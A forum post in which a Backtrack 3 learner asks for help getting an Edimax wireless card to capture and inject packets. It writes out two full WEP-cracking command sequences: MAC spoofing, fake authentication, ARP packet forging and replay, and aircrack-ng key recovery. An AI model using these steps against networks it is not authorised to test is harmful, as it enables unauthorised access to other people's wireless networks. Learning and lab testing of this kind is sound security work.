how to connect Edimax ew-7318usg with Backtrack 3 for use with kismet and airodump...
Hi, this is my first post so please help....im currently using Hardy heron and also Backtrack 3 to learn all about linux and security..
my problems is that i cant get the airodump & aireplay to work as they should on BT3
Now the process i use is this:
Vertion 1.............Configure card
Code:
modprobe -r rt73 (unload driver)
modprobe rt73 (load driver)
ifconfig rausb0 up (interface up)
iwconfig rausb0 rate 1M (Lower card rate to 1MB)
# airmon-ng stop rausb0
# ifconfig rausb0 down
# macchanger --mac 00:11:22:33:44:55 rausb0
# airmon-ng start rausb0
# airodump-ng rausb0
find the bssid and ctrl-c out
# airodump-ng -c <channel> -w <output> --bssid <mac> rausb0
open a second xterm
# aireplay-ng -1 0 -a <mac> -h 00:11:22:33:44:55 rausb0 or
# aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a <mac> -h 00:11:22:33:44:55 rausb0
and it should successfully associate. Use only one of the two above commands. Sometimes one won't work.
# aireplay-ng -4 -b <mac> -h 00:11:22:33:44:55 rausb0
answer yes and wait
# packetforge-ng --arp -a <mac> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y <output>.xor -w arprequest
# aireplay-ng -2 -r arprequest rausb0
say yes
switch to first xterm and watch data climb
open third xterm and
# aircrack-ng <output>*.cap
.....Now with airodump i cant pick up any BSSID, not even my own one that im trying to play with
Version 2 :
Wep
Code:
airodump-ng rausb0 (Scans SSID's)
airodump-ng -c <channel> -w <output> --bssid <mac> rausb0 (target SSID)
aireplay-ng -1 0 -a <mac> -h <yourmac> rausb0 (authenticate)
aireplay-ng -3 -b <mac> -h <yourmac> rausb0 (inject IV's)
aircrack-ng -n 128 <output>*.cap ..
Now with this one i can pick up BSSID and play with it , however authenication and ijections doesnt work....
Please help with a how to guide....
thanks in advance...
|